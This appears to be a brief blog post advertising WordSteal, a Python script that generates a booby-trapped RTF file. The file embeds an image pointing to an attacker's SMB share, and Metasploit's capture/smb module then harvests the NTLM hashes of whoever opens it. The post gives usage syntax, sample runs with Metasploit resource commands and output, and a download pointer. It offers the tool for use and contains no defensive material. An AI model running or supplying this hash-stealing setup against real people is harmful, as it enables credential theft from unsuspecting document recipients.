This is a short post about WordSteal, an open source Python script that steals Microsoft NTLM hashes for you. It does so by leveraging the Metasploit toolkit to steal Microsoft NTLM hashes containing a malicious image payload.
It has been known for quiet some time that Microsoft Word versions upwards of Office 95 allow us to embed image files. This functionality has also been used by the CIA “Scribbles” project, which is a document-watermarking pre-processing system to embed “Web beacon”-style tags into documents to track people who might spread protected content.
WordSteal uses the auxiliary/server/capture/smb Metasploit module to perform it’s magic. We all know that this module acts as a SMB share to capture a targeted users password hashes and possibly store them in a John the Ripper format.
The script is simple to use works in the following manner:
# python main.py Usage : main.py IP IMAGENAME run_listener Example: main.py 127.0.0.1 test.jpg 0 Example: main.py 127.0.0.1 test.jpg 1 Infogen AL - https://www.infogen.al/
If you want to run the listener, use the “1” argument. For example:
python main.py 127.0.0.1 sample.jpg 1 [+] Generated malicious file: 1497402033.rtf [+] [+] Script Generated Successfully [+] [+] Running Metasploit Auxiliary Module [+] [*] Processing metasploit.rc for ERB directives. resource (metasploit.rc)> use auxiliary/server/capture/smb resource (metasploit.rc)> set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 resource (metasploit.rc)> set JOHNPWFILE passwords JOHNPWFILE => passwords resource (metasploit.rc)> run [*] Auxiliary module execution completed [*] Server started. <----- SNIP ------->
If you do not want to run the listener and simply want to generate a file, use the “0” argument. For example:
# python main.py pentestit.com sample.jpg 0 [+] Generated malicious file: 1497402786.rtf [+] Infogen AL - https://www.infogen.al/
With no external dependencies, grab WordSteal from the GIT repository here!